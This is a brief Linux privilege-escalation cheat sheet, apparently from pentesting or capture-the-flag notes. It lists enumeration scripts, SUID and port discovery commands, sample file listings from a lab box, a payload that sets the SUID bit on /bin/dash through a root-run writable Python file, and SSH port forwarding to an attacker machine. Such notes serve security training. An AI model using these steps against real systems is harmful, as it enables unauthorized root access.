Linux Priv Esc
Tools and commands for an initial post exploitation recon
Useful Priv esc enumeration scripts
LinEnum.sh
linux-exploit-suggester
linuxprivchecker.py
unixprivesc.sh
For see the procs running:
Check the version of installed software
dpkg -s <program name>
A way to enumerate users, groups, files, and permissions
find /home -printf "%f\t%p\t%u\t%g\t%m\n" 2>/dev/null |column -t
.bash_logout /home/george/.bash_logout george george 644
.bashrc /home/george/.bashrc george george 644
torrenthoster.zip /home/george/torrenthoster.zip george george 644
motd.legal-displayed /home/george/.cache/motd.legal-displayed george george 644
.sudo_as_admin_successful /home/george/.sudo_as_admin_successful george george 644
user.txt /home/george/user.txt george george 644
.nano_history /home/george/.nano_history root root 600
.mysql_history /home/george/.mysql_history root root 600
.bash_history /home/george/.bash_history root root 600
.profile /home/george/.profile george george 644
Look for a specific package installed a system
dpkg -l |grep -i <package>
Look for set UID files
find / -perm -4000 2>/dev/null
World writable python file ran as root (SUID) - dash priv esc
os.system('chmod 4755 /bin/dash')
with the sticky bit set on /bin/dash, type dash
running the id will show that our euid (effective uid) is now root
we are now able to run commands as root
Find which ports a server is listening on
netstat -an |grep LIST
Check if ASLR is enabled
cat /proc/sys/kernel/randomize_va_space 0
0 -> means that ASLR is disabled. 1 -> means that it is enabled
Check for Locally running services and port forward them to our machine
netstat -natp |grep 127.0.0.1
run this on the target linux box
Port forwarding local ports to attacker machine
ssh -L 52846:127.0.0.1:52846 jimmy@10.10.10.171
run this command from your attacker machine
then check the local port in your web browser on your attacker machine
e.g. 127.0.0.1:52846/
Last updated